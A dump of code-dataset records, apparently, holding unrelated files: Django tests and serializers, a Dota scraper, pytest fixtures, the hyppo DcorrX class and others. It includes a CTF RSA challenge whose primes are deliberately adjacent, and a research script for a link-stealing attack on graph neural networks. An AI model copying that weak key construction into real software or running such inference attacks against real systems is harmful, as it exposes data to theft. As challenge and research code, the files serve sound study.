c.get(\"/advertisement/1/quiz\", content_type='application/json')\n pprint(response.json())\n self.assertEqual(response.status_code, 200)\n\n def test_question_list_view_negative(self):\n c = Client()\n\n response = c.get(\"/advertisement/10/quiz\", content_type='application/json')\n pprint(response.json())\n self.assertEqual(response.json(), [])\n","sub_path":"quiz/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"117181314","text":"from patchNoteExtractor import PatchNoteExtractor\nfrom totalLinkExtractor import DotaLinkExtractor\nimport time\n\nif __name__ == \"__main__\":\n totalLinks = []\n count = 0\n #Start here\n fileName = \"../htmlData/dota\" + str(count) + \".html\"\n print(\"Extracting\")\n dle = DotaLinkExtractor(\"http://dota2.gamepedia.com\",\"/Category:Patches\",fileName)\n data = dle.scrape()\n totalLinks = data['allLinks']\n \n while data['nextPage']:\n print(\"Next Page\")\n count += 1\n fileName = \"../htmlData/dota\" + str(count) + \".html\"\n dle = DotaLinkExtractor(\"http://dota2.gamepedia.com\",data['nextPage'],fileName)\n data = dle.scrape()\n totalLinks += data['allLinks']\n \n #all the patch note links:\n print(\"Data Extracted: \",len(totalLinks))\n\n\n #Now for each patch note:\n patchNoteInformation = {}\n fileName = \"../htmlData/dotaPatchNote\"\n\n \n for x in totalLinks:\n dle = PatchNoteExtractor(\"http://dota2.gamepedia.com\",x,fileName)\n patchNoteInformation[x],readFile = dle.scrape()\n if not readFile:\n time.sleep(60)\n\n for x in patchNoteInformation.keys():\n print(x)\n for y in patchNoteInformation[x].keys():\n print(y)\n print(patchNoteInformation[x][y])\n","sub_path":"py/dotaExtractor.py","file_name":"dotaExtractor.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"189729348","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom sympy import randprime, nextprime, invert\n\np = randprime(2**1023, 2**1024)\nq = nextprime(p)\nn = p * q\ne = 65537\nphi = (p-1)*(q-1)\nd = int(invert(e, phi))\nkey = RSA.construct((n, e, d, p, q))\nrsa = PKCS1_OAEP.new(key)\nprint(n)\nprint(rsa.encrypt(open('./flag.txt', 'rb').read()))\n","sub_path":"EquinorCTF/Really Solid Algebra/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493595472","text":"from __future__ import print_function\nimport argparse\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Input\nfrom keras.optimizers import Adam\nfrom keras_utils import *\nfrom sklearn.metrics import precision_score, recall_score, roc_auc_score, accuracy_score\nimport json\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.spatial.distance import cosine, euclidean, correlation, chebyshev,\\\n braycurtis, canberra, cityblock, sqeuclidean\nfrom utils import kl_divergence, js_divergence, entropy\n\nbatch_size = 128\nnum_classes = 2\nepochs = 50\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '--dataset1',\n type=str,\n default='citeseer',\n help='citeseer, cora or pubmed')\nparser.add_argument(\n '--dataset2', type=str, default='cora', help='citeseer, cora or pubmed')\nparser.add_argument(\n '--datapath', type=str, default=\"data/dataset/original/\", help=\"data path\")\nparser.add_argument(\n '--prediction_path',\n type=str,\n default='data/pred/',\n help='prediction saved path')\nparser.add_argument(\n '--partial_graph_path',\n type=str,\n default='data/partial_graph_with_id/',\n help='partial graph saved path')\nparser.add_argument('--ratio', type=str, default='0.5', help='(0.1,1.0,0.1)')\nparser.add_argument(\n '--operator',\n type=str,\n default='concate_all',\n help='average,hadamard,weighted_l1,weighted_l2,concate_all')\nparser.add_argument(\n '--metric_type',\n type=str,\n default='entropy',\n help='kl_divergence, js_divergence, entropy')\n\nargs = parser.parse_args()\ndataset1 = args.dataset1 # shadow model\ndataset2 = args.dataset2 # target model\ndatapath = args.datapath\nprediction_path = args.prediction_path\npartial_graph_path = args.partial_graph_path\nratio = args.ratio\noperator = args.operator\nmetric_type = args.metric_type\n\n\ndef average(a, b):\n return (a + b) / 2\n\n\ndef hadamard(a, b):\n return a * b\n\n\ndef weighted_l1(a, b):\n return abs(a - b)\n\n\ndef weighted_l2(a, b):\n return abs((a - b) * (a - b))\n\n\ndef concate_all(a, b):\n return np.concatenate(\n (average(a, b), hadamard(a, b), weighted_l1(a, b), weighted_l2(a, b)))\n\n\ndef operator_func(operator, a, b):\n if operator == \"average\":\n return average(a, b)\n elif operator == \"hadamard\":\n return hadamard(a, b)\n elif operator == \"weighted_l1\":\n return weighted_l1(a, b)\n elif operator == \"weighted_l2\":\n return weighted_l2(a, b)\n elif operator == \"concate_all\":\n return concate_all(a, b)\n\n\ndef get_metrics(a, b, metric_type, operator_func):\n if metric_type == \"kl_divergence\":\n s1 = np.array([kl_divergence(a, b)])\n s2 = np.array(kl_divergence(b, a))\n\n elif metric_type == \"js_divergence\":\n s1 = np.array([js_divergence(a, b)])\n s2 = np.array(js_divergence(b, a))\n\n elif metric_type == \"entropy\":\n s1 = np.array([entropy(a)])\n s2 = np.array([entropy(b)])\n else:\n raise ValueError(\"metric_type undefined\")\n\n return operator_func(operator, s1, s2)\n\n\ndef load_data(train_path1, test_path1, train_path2, test_path2):\n similarity_list = [cosine, euclidean, correlation, chebyshev,\n braycurtis, canberra, cityblock, sqeuclidean]\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n train_data = open(train_path1).readlines() + \\\n open(test_path1).readlines() # all row from dataset1\n test_data = open(test_path2).readlines() # test set from dataset2\n for row in train_data:\n row = json.loads(row)\n\n # generate train_data from shadow dataset\n t0 = np.array(row[\"gcn_pred0\"])\n t1 = np.array(row[\"gcn_pred1\"])\n target_similarity = np.array([row(t0, t1) for row in similarity_list])\n metrics_vec = get_metrics(t0, t1, metric_type, operator_func)\n line = np.concatenate((target_similarity, metrics_vec))\n # line = metrics_vec\n # line = target_similarity\n line = np.nan_to_num(line)\n x_train.append(line)\n y_train.append(row[\"label\"])\n\n for row in test_data:\n row = json.loads(row)\n\n # generate train_data from shadow dataset\n t0 = np.array(row[\"gcn_pred0\"])\n t1 = np.array(row[\"gcn_pred1\"])\n target_similarity = np.array([row(t0, t1) for row in similarity_list])\n metrics_vec = get_metrics(t0, t1, metric_type, operator_func)\n line = np.concatenate((target_similarity, metrics_vec))\n # line = metrics_vec\n # line = target_similarity\n line = np.nan_to_num(line)\n\n # generate test_data from target datasetc\n x_test.append(line)\n y_test.append(row[\"label\"])\n return np.array(x_train), np.array(x_test), np.array(y_train), np.array(\n y_test)\n\n\n# the data, split between train and test sets\ntrain_path1 = partial_graph_path + \\\n \"%s_train_ratio_%s_train.json\" % (dataset1, ratio)\ntest_path1 = partial_graph_path + \\\n \"%s_train_ratio_%s_test.json\" % (dataset1, ratio)\ntrain_path2 = partial_graph_path + \\\n \"%s_train_ratio_%s_train.json\" % (dataset2, ratio)\ntest_path2 = partial_graph_path + \\\n \"%s_train_ratio_%s_test.json\" % (dataset2, \"0.9\")\n\nx_train, x_test, y_train, y_test = load_data(\n train_path1, test_path1, train_path2, test_path2)\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nss = StandardScaler()\n# ms = MinMaxScaler()\nx_train = ss.fit_transform(x_train)\nx_test = ss.fit_transform(x_test)\n\nx_train_shape = x_train.shape[-1]\nx_test_shape = x_train_shape\n\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n# convert class vectors to binary class matrices\ny_train = keras.utils.np_utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.np_utils.to_categorical(y_test, num_classes)\n\ninput1 = Input(shape=(x_train_shape,))\nx1 = Dense(32, activation='relu')(input1)\nx1 = Dropout(0.5)(x1)\nx1 = Dense(32, activation='relu')(x1)\nx1 = Dropout(0.5)(x1)\nout = Dense(num_classes, activation='softmax')(x1)\nmodel = Model(inputs=input1, outputs=out)\n\nmodel.compile(\n loss=\"categorical_crossentropy\", optimizer=Adam())\n\n\nmodel.fit(\n x_train,\n y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test))\n\nscore = model.evaluate(x_test, y_test, verbose=0)\ny_pred = model.predict(x_test)\n\n# add precision recall score\ny_test_label = [row[1] for row in y_test]\ny_pred_label = [round(row[1]) for row in y_pred]\n\ntest_acc = accuracy_score(y_test_label, y_pred_label)\ntest_precision = precision_score(y_test_label, y_pred_label)\ntest_recall = recall_score(y_test_label, y_pred_label)\ntest_auc = roc_auc_score(y_test, y_pred)\nprint('Test accuracy:', test_acc)\nprint(\"Test Precision\", test_precision)\nprint(\"Test Recall\", test_recall)\nprint('Test auc:', test_auc)\n\nwith open(\"result/attack_1.txt\", \"a\") as wf:\n wf.write(\n \"%s,%s,%d,%0.5f,%0.5f,%0.5f,%s\\n\" %\n (dataset2, \"attack1_transfer_metrics_target:%s_shadow:%s\" %\n (dataset2, dataset1), epochs, test_precision, test_recall, test_auc, ratio))\n","sub_path":"stealing_link/attack_1.py","file_name":"attack_1.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"100928412","text":"from .models import User, Schedule, FriendRequest, Notification, Course, Degree, College, CoursePriority, Preference, Day, Faculty, Building, Section, CourseOffering, Timeslot, Room, FlowchartTerm\n\ndef save_friend_request(sender, instance, **kwargs):\n if(instance.accepted and not(instance.notified)):\n Notification(category='Friend', content=instance.to_user.first_name+' accepted your friend request!', seen=False, to_user=instance.from_user).save()\n instance.notified = True\n instance.save()\n\n\ndef save_schedule(sender, instance, created, **kwargs):\n if(created):\n for u in instance.user.friends.all().exclude(id=instance.user.id):\n Notification(category='Schedule', content=instance.user.first_name+' saved a new schedule named \\''+instance.title+'\\'!', seen=False, to_user=u).save()\n else:\n for u in instance.user.friends.all().exclude(id=instance.user.id):\n Notification(category='Schedule', content=instance.user.first_name+' modified the schedule named \\''+instance.title+'\\'!', seen=False, to_user=u).save()\n\ndef save_user(sender, instance, created, **kwargs):\n if(created):\n Preference(user=instance, earliest_class_time='07:30:00', latest_class_time='21:00:00', break_length=15, min_courses=0, max_courses=10).save()\n\ndef save_preference(sender, instance, **kwargs):\n if(instance.earliest_class_time != None):\n for u in instance.user.friends.all().exclude(id=instance.user.id):\n Notification(category='Friend', content=instance.user.first_name+' modified their preferences!', seen=False, to_user=u).save()\n\ndef save_courseoffering(sender, instance, **kwargs):\n def checkCourseExists(schedule, offering):\n for s in schedule:\n if(s == offering):\n return True\n return False\n if(instance.max_enrolled == instance.current_enrolled):\n for s in Schedule.objects.all():\n if(checkCourseExists(s.courseOfferings.all(), instance)):\n Notification(category='Schedule', content=instance.course.course_code+' in schedule \\''+s.title+'\\' is now full!', seen=False, to_user=s.user).save()","sub_path":"api/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436304317","text":"#import django\n#django.setup()\nfrom gestione.models import IDcod,Carico,Genere,Saldo,ExCsBl,Produttore\nfrom django.db.models import Q\nfrom decimal import Decimal\nimport re\nimport sys\nimport io\n\nclass CreateData:\n \n def EntrataBolla(self,ls,bl,bl1,dt,facc,tras,vari,cl):\n rec=0\n cnt=0\n i=0\n before=\" \"\n tot=0\n totcss=0\n pssum=0\n csssum=0\n cssexitsum=0\n line= sorted(ls, key=lambda k: k['cod']) \n seg=line[0][\"cod\"].split('-')\n pc=Carico.objects.filter(Q(bolla=bl),Q(idcod__produttore__id=cl))\n pc1=Carico.objects.filter(Q(bolla=bl1),Q(idcod__produttore__id=cl))\n if (pc1):\n if(bl!=bl1):\n return 3\n for item in line:\n pssum+=Decimal(item[\"ps\"])\n csssum+=int(item[\"css\"])\n \n if(pc):\n p=pc.filter().values(\"qn\",\"cassa\",\"cassaexit\",\"idcod__id\",\"data\",\"excsbl__id\")\n o=p[0][\"qn\"]\n o1=p[0][\"excsbl__id\"]\n rec=ExCsBl.objects.get(id=o1)\n rec.facc=Decimal(facc)\n rec.trasporto=Decimal(tras)\n rec.vari=Decimal(vari)\n rec.qn=pssum\n rec.cassa=csssum\n rec.bolla=bl1\n rec.data=dt\n rec.save()\n data=list(p)\n pc.delete()\n dt=data[0][\"data\"]\n cnt=1\n s=Saldo.objects.all()\n cod=IDcod.objects.all()\n \n for item in line:\n if(item[\"tara\"]==\"\"):\n item[\"tara\"]=-1\n diff=int(item[\"css\"])\n csx=0\n try:\n for itemp in data:\n if (int(item[\"id\"])==int(itemp[\"idcod__id\"])):\n csx=int(itemp[\"cassaexit\"])\n diff=int(item[\"css\"])-int(itemp[\"cassa\"])\n except:\n data=\"\"\n s1=s.get(idcod_id=item[\"id\"])\n qs=s1.q\n s1.q=qs+diff\n s1.save()\n codid=cod.get(id=item[\"id\"])\n prd=Produttore.objects.get(id=cl)\n if(cnt==0):\n rec=ExCsBl(produttore=prd,data=dt,bolla=bl1,facc=Decimal(facc),trasporto=Decimal(tras),vari=Decimal(vari),qn=pssum,cassa=csssum)\n rec.save() \n rec1=Carico(excsbl=rec,tara=item[\"tara\"],qn=item[\"ps\"],cassa=item[\"css\"],bolla=bl1,idcod=codid,data=dt,cassaexit=csx)\n rec1.save()\n cnt=1\n return 2 \n \n ","sub_path":"Magazzino/Creazione/MCreateTable.py","file_name":"MCreateTable.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"313948772","text":"import os\nimport stat\nfrom distutils.dir_util import copy_tree, remove_tree\nimport tarfile\nimport tempfile\nfrom types import TracebackType\nfrom typing import List, Optional, Type\nimport pytest\nfrom pygit2 import Repository, init_repository\nfrom battenberg.core import Battenberg\n\n\nclass TemporaryRepository:\n \"\"\"\n Constructs a git repo from the tests/data/testrepo.tar file in the /tmp directory.\n\n Taken from pygit2 tests: https://github.com/libgit2/pygit2/blob/master/test/utils.py\n \"\"\"\n\n def __enter__(self) -> 'TemporaryRepository':\n name = 'testrepo'\n repo_path = os.path.join(os.path.dirname(__file__), 'data', f'{name}.tar')\n self.temp_dir = tempfile.mkdtemp()\n temp_repo_path = os.path.join(self.temp_dir, name)\n tar = tarfile.open(repo_path)\n tar.extractall(self.temp_dir)\n tar.close()\n return temp_repo_path\n\n def __exit__(self, type: Optional[Type[BaseException]], value: Optional[BaseException],\n traceback: TracebackType):\n if os.path.exists(self.temp_dir):\n remove_tree(self.temp_dir)\n\n\n@pytest.fixture\ndef repo() -> Repository:\n with TemporaryRepository() as repo_path:\n yield Repository(repo_path)\n\n\ndef copy_template(repo: Repository, name : str, commit_message: str, parents: List[str] = None) -> str:\n template_path = os.path.join(os.path.dirname(__file__), 'data', name)\n # Use distuils implementation instead of shutil to allow for copying into\n # a destination with existing files. See: https://stackoverflow.com/a/31039095/724251\n copy_tree(template_path, repo.workdir)\n\n # Stage the template changes\n repo.index.add_all()\n repo.index.write()\n tree = repo.index.write_tree()\n # Construct a commit with the staged changes.\n return repo.create_commit(\n None,\n repo.default_signature,\n repo.default_signature,\n commit_message,\n tree,\n parents or []\n )\n\n\n@pytest.fixture\ndef template_repo() -> Repository:\n repo_path = tempfile.mkdtemp()\n repo = init_repository(repo_path, initial_head='main')\n\n # Copy template contents into a temporary repo for each test.\n main_commit_id = copy_template(repo, 'template', 'Prepared template installation')\n repo.branches.local.create('main', repo[main_commit_id])\n repo.checkout('refs/heads/main')\n\n # Construct a new \"upgrade\" branch which battenberg can target during upgrade.\n upgrade_commit_id = copy_template(\n repo,\n 'upgrade-template',\n 'Prepared upgrade-template installation',\n parents=[main_commit_id]\n )\n repo.branches.local.create('upgrade', repo[upgrade_commit_id])\n\n return repo\n\n\n@pytest.fixture\ndef installed_repo(repo: Repository, template_repo: Repository) -> Repository:\n battenberg = Battenberg(repo)\n battenberg.install(template_repo.workdir, no_input=True)\n return repo\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"343877625","text":"from ..independence import Dcorr\nfrom ._utils import _CheckInputs, compute_stat\nfrom .base import TimeSeriesTest\n\n\nclass DcorrX(TimeSeriesTest):\n r\"\"\"\n Class for running the DcorrX test for independence of time series.\n\n DcorrX is an independence test between two (paired) time series of\n not necessarily equal dimensions. The population parameter is 0 if and only if the\n time series are independent. It is based upon energy distance between distributions.\n\n Parameters\n ----------\n compute_distance : callable(), optional (default: \"euclidean\")\n A function that computes the distance among the samples within each\n data matrix.\n Valid strings for ``metric`` are, as defined in\n ``sklearn.metrics.pairwise_distances``,\n\n - From scikit-learn: [‘cityblock’, ‘cosine’, ‘euclidean’, ‘l1’, ‘l2’,\n ‘manhattan’] See the documentation for scipy.spatial.distance for details\n on these metrics.\n - From scipy.spatial.distance: [‘braycurtis’, ‘canberra’, ‘chebyshev’,\n ‘correlation’, ‘dice’, ‘hamming’, ‘jaccard’, ‘kulsinski’, ‘mahalanobis’,\n ‘minkowski’, ‘rogerstanimoto’, ‘russellrao’, ‘seuclidean’,\n ‘sokalmichener’, ‘sokalsneath’, ‘sqeuclidean’, ‘yule’] See the\n documentation for scipy.spatial.distance for details on these metrics.\n\n Set to `None` or `precomputed` if `x` and `y` are already distance\n matrices. To call a custom function, either create the distance matrix\n before-hand or create a function of the form ``metric(x, **kwargs)``\n where `x` is the data matrix for which pairwise distances are\n calculated and kwargs are extra arguements to send to your custom function.\n\n max_lag : int, optional (default: 0)\n The maximum number of lags in the past to check dependence between `x` and the\n shifted `y`. Also the :math:`M` hyperparmeter below.\n\n See Also\n --------\n Dcorr: Distance correlation test statistic and p-value.\n MGCX : Cross multiscale graph correlation test statistic and p-value.\n\n Notes\n -----\n The statistic can be derived as follows [#1DcorX]_:\n\n Let :math:`x` and :math:`y` be :math:`(n, p)` and :math:`(n, q)` series\n respectively, which each contain :math:`y` observations of the series\n :math:`(X_t)` and :math:`(Y_t)`. Similarly, let :math:`x[j:n]` be the\n :math:`(n-j, p)` last :math:`n-j` observations of :math:`x`. Let :math:`y[0:(n-j)]`\n be the :math:`(n-j, p)` first :math:`n-j` observations of :math:`y`. Let :math:`M`\n be the maximum lag hyperparameter. The cross distance correlation is,\n\n .. math::\n\n DcorrX_n (x, y) = \\sum_{j=0}^M \\frac{n-j}{n}\n Dcorr_n (x[j:n], y[0:(n-j)])\n\n References\n ----------\n .. [#1DcorX] Mehta, R., Chung, J., Shen C., Xu T., Vogelstein, J. T. (2019).\n A Consistent Independence Test for Multivariate Time-Series.\n ArXiv\n \"\"\"\n\n def __init__(self, compute_distance=\"euclidean\", max_lag=0, **kwargs):\n TimeSeriesTest.__init__(\n self, compute_distance=compute_distance, max_lag=max_lag, **kwargs\n )\n\n def _statistic(self, x, y):\n r\"\"\"\n Helper function that calculates the DcorrX test statistic.\n\n Parameters\n ----------\n x, y : ndarray\n Input data matrices. `x` and `y` must have the same number of\n samples. That is, the shapes must be `(n, p)` and `(n, q)` where\n `n` is the number of samples and `p` and `q` are the number of\n dimensions. Alternatively, `x` and `y` can be distance matrices,\n where the shapes must both be `(n, n)`.\n\n Returns\n -------\n stat : float\n The computed DcorrX statistic.\n opt_lag : int\n The computed optimal lag.\n \"\"\"\n stat, opt_lag = compute_stat(\n x, y, Dcorr, self.compute_distance, self.max_lag, **self.kwargs\n )\n self.stat = stat\n self.opt_lag = opt_lag\n\n return stat, opt_lag\n\n def test(self, x, y, reps=1000, workers=1):\n r\"\"\"\n Calculates the DcorrX test statistic and p-value.\n\n Parameters\n ----------\n x, y : ndarray\n Input data matrices. `x` and `y` must have the same number of\n samples. That is, the shapes must be `(n, p)` and `(n, q)` where\n `n` is the number of samples and `p` and `q` are the number of\n dimensions. Alternatively, `x` and `y` can be distance matrices,\n where the shapes must both be `(n, n)`.\n reps : int, optional (default: 1000)\n The number of replications used to estimate the null distribution\n when using the permutation test used to calculate the p-value.\n workers : int, optional (default: 1)\n The number of cores to parallelize the p-value computation over.\n Supply -1 to use all cores available to the Process.\n auto : bool (default: True)\n Automatically uses fast approximation when sample size and size of array\n is greater than 20. If True, and sample size is greater than 20, a fast\n chi2 approximation will be run. Parameters ``reps`` and ``workers`` are\n irrelevant in this case.\n\n Returns\n -------\n stat : float\n The computed DcorrX statistic.\n pvalue : float\n The computed DcorrX p-value.\n dcorrx_dict : dict\n Contains additional useful returns containing the following keys:\n\n - opt_lag : int\n The optimal lag that maximizes the strength of the relationship.\n\n Examples\n --------\n >>> import numpy as np\n >>> from hyppo.time_series import DcorrX\n >>> np.random.seed(456)\n >>> x = np.arange(7)\n >>> y = x\n >>> stat, pvalue, dcorrx_dict = DcorrX().test(x, y, reps = 100)\n >>> '%.1f, %.2f, %d' % (stat, pvalue, dcorrx_dict['opt_lag'])\n '1.0, 0.01, 0'\n\n The increasing the max_lag can increase the ability to identify dependence.\n\n >>> import numpy as np\n >>> from hyppo.time_series import DcorrX\n >>> np.random.seed(1234)\n >>> x = np.random.permutation(10)\n >>> y = np.roll(x, -1)\n >>> stat, pvalue, dcorrx_dict = DcorrX(max_lag=1).test(x, y, reps=1000)\n >>> '%.1f, %.2f, %d' % (stat, pvalue, dcorrx_dict['opt_lag'])\n '1.1, 0.01, 1'\n \"\"\"\n check_input = _CheckInputs(\n x,\n y,\n max_lag=self.max_lag,\n )\n x, y = check_input()\n\n stat, pvalue, stat_list = super(DcorrX, self).test(x, y, reps, workers)\n dcorrx_dict = {\"opt_lag\": stat_list[1]}\n return stat, pvalue, dcorrx_dict\n","sub_path":"hyppo/time_series/dcorrx.py","file_name":"dcorrx.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"245529467","text":"from rest_framework import serializers\nfrom .models import MedOrgType, MedOrgPrincipal\nfrom django_server.apps.org.models import MedSaleOpportunity\nfrom django_server.utils.translate import RELATION, SALE_OPPORTUNITY_STATE\nfrom django_server.apps.user.models import UserExtra\nfrom django_server.apps.operate.models import UserOrgRecentEvent, UserOrgRecentCooperation, UserOrgRecentGCBulletin\n\n\nclass MedTypeSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n user = serializers.IntegerField(source='user.id', read_only=True)\n type_name = serializers.CharField()\n description = serializers.CharField()\n is_default = serializers.BooleanField()\n created_at = serializers.DateTimeField(format='%Y-%m-%d')\n org_count = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('user', 'type', 'description', 'is_default', 'created_at')\n\n def get_org_count(self, obj):\n try:\n org_count = MedOrgType.objects.filter(type_id=obj.id).count()\n except Exception as e:\n org_count = 0\n return org_count\n\n\nclass MedOrgTypeSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n user = serializers.IntegerField(source='user.id', read_only=True)\n type_id = serializers.IntegerField(source='type.id', read_only=True)\n type_name = serializers.CharField()\n state = serializers.CharField()\n org_type = serializers.CharField()\n org_uuid = serializers.CharField()\n created_at = serializers.DateTimeField(format='%Y-%m-%d')\n org_name = serializers.CharField()\n scholar_uuid = serializers.CharField()\n scholar_name = serializers.CharField()\n\n class Meta:\n fields = ('id', 'type_id', 'org', 'created_at', 'org_name')\n\n\nclass RelationCountSerializer(serializers.Serializer):\n relation = serializers.CharField()\n count = serializers.IntegerField()\n proportion = serializers.FloatField()\n\n class Meta:\n fields = ('relation', 'count', 'proportion')\n\n\nclass RelationSerializer(serializers.Serializer):\n user_id = serializers.IntegerField()\n org_uuid = serializers.UUIDField()\n org_name = serializers.CharField()\n org_type = serializers.CharField()\n user_name = serializers.SerializerMethodField()\n relation = serializers.CharField()\n activity_state = serializers.SerializerMethodField()\n new_message = serializers.SerializerMethodField()\n created_at = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')\n\n class Meta:\n fields = ('user_name', 'activity_state', 'new_message')\n\n def get_activity_state(self, obj):\n try:\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[obj.activity_state]\n if obj.activity_state == MedOrgPrincipal.ACTIVITY_STATE_RELATION:\n state = state.format(RELATION[obj.relation])\n elif obj.activity_state == MedOrgPrincipal.ACTIVITY_STATE_UPDATE_SALE_OPPORTUNITY:\n user = self.context['request'].user\n entity = MedSaleOpportunity.objects.filter(user_id=user.id, org_uuid=obj.org_uuid, state='1').order_by('-updated_at')[0]\n state = state.format(SALE_OPPORTUNITY_STATE[entity.progress])\n return state\n except Exception as e:\n print(e)\n return '新负责'\n\n def get_user_name(self, obj):\n return UserExtra.objects.get(user_id=obj.user_id).name\n\n def get_new_message(self, obj):\n new_message = False\n if UserOrgRecentEvent.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentCooperation.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentGCBulletin.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n return new_message\n\n\nclass PrincipalOrgSerializer(serializers.Serializer):\n user_id = serializers.IntegerField()\n user_name = serializers.CharField(source='user.name')\n org_uuid = serializers.CharField()\n org_name = serializers.CharField()\n org_type = serializers.CharField()\n updated_at = serializers.SerializerMethodField()\n relation = serializers.SerializerMethodField()\n activity_state = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('user_id', 'org_uuid', 'org_name', 'org_type', 'updated_at', 'relation', 'activity_state')\n\n def get_relation(self, obj):\n if hasattr(obj, 'relation'):\n return obj.relation\n return '5'\n\n def get_updated_at(self, obj):\n if hasattr(obj, 'updated_at'):\n return obj.updated_at\n return obj.created_at\n\n def get_activity_state(self, obj):\n if hasattr(obj, 'activity_state'):\n activity_state = obj.activity_state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_RELATION:\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(int(obj.relation)*20+20)\n return state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_UPDATE_SALE_OPPORTUNITY:\n user = self.context['request'].user\n entity = MedSaleOpportunity.objects.filter(user_id=user.id, org_uuid=str(obj.org_uuid), state='1').order_by(\n '-updated_at')[0]\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(SALE_OPPORTUNITY_STATE[entity.progress])\n return state\n return MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state]\n else:\n return '新关注'\n\n\nclass ManagePrincipalOrgSerializer(PrincipalOrgSerializer):\n new_message = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('new_message',)\n\n def get_new_message(self, obj):\n new_message = False\n if UserOrgRecentEvent.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentCooperation.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentGCBulletin.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n return new_message\n\n\nclass NewAssignSerializer(serializers.Serializer):\n user_id = serializers.CharField()\n user_name = serializers.CharField(source='user.name')\n org_uuid = serializers.CharField()\n org_name = serializers.CharField()\n org_type = serializers.CharField()\n assign_user = serializers.SerializerMethodField()\n created_at = serializers.DateTimeField()\n\n class Meta:\n fields = ('org_uuid', 'org_name', 'org_type', 'created_at', 'boss_id')\n\n def get_assign_user(self, obj):\n try:\n ret = UserExtra.objects.filter(user_id=int(obj.assign_user)).values_list('name', flat=True)\n if ret:\n return ret[0]\n else:\n return None\n except Exception as e:\n return None\n\n\nclass ZoneListSerializer(serializers.Serializer):\n user_id = serializers.IntegerField()\n org_uuid = serializers.CharField()\n org_name = serializers.CharField()\n updated_at = serializers.DateTimeField()\n relation = serializers.CharField()\n org_type = serializers.CharField()\n activity_state = serializers.SerializerMethodField()\n\n def get_activity_state(self, obj):\n if hasattr(obj, 'activity_state'):\n activity_state = obj.activity_state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_RELATION:\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(int(obj.relation)*20+20)\n return state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_UPDATE_SALE_OPPORTUNITY:\n user = self.context['request'].user\n entity = MedSaleOpportunity.objects.filter(user_id=user.id, org_uuid=str(obj.org_uuid), state='1').order_by(\n '-updated_at')[0]\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(SALE_OPPORTUNITY_STATE[entity.progress])\n return state\n return MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state]\n return '新关注'\n","sub_path":"scripts/marketbox-medical-svr/django_server/apps/manage/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"471374928","text":"''' Kevin and Stuart want to play the 'The Minion Game'\n Game Rules:\n Both players are given the same string, $.\n Both players have to make substrings using the letters of the string $.\n Stuart has to make words starting with consonants.\n Kevin has to make words starting with vowels.\n The game ends when both players have made all possible substrings.\n\n Scoring:\n A player gets +1 point for each occurrence of the substring in the string $.\n For Example:\n String $ = BANANA\n Kevin's vowel beginning word = ANA\n Here, ANA occurs twice in BANANA. Hence, Kevin will get 2 Points.'''\n \nstr=input().strip()\nlist1=list(str)\nstring=''\nk=0\ns=0\nfor i in range(0,len(list1)):\n if list1[i] in ['a','e','i','o','u','A','E','I','O','U']:\n 